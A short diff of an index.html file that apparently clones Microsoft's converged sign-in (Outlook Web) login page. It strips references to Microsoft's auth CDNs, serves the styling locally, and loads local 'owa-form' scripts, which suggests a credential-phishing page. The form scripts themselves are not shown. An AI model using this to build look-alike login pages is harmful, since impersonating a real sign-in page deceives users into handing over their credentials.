--- a/index.html
+++ b/index.html
@@ -5,17 +5,14 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
     <meta http-equiv="Pragma" content="no-cache">
-    <link rel="preconnect" href="https://aadcdn.msauth.net" crossorigin="">
     <meta http-equiv="x-dns-prefetch-control" content="on">
-    <link rel="dns-prefetch" href="//aadcdn.msauth.net">
-    <link rel="dns-prefetch" href="//aadcdn.msftauth.net">
     <meta name="PageID" content="ConvergedSignIn">
     <meta name="SiteID" content="">
     <meta name="ReqLC" content="4096">
     <meta name="LocLC" content="en-GB-OXENDICT">
     <meta name="format-detection" content="telephone=no">
     <meta name="robots" content="none">
-    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_mkpl9nldoqjz1veio3hiig2.css" rel="stylesheet">
+    <link data-loader="cdn" crossorigin="anonymous" href="style.css" rel="stylesheet">
     <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
   <script type="module" crossorigin src="owa-form.js"></script>
   <script type="module" crossorigin src="owa-jeff.js"></script>
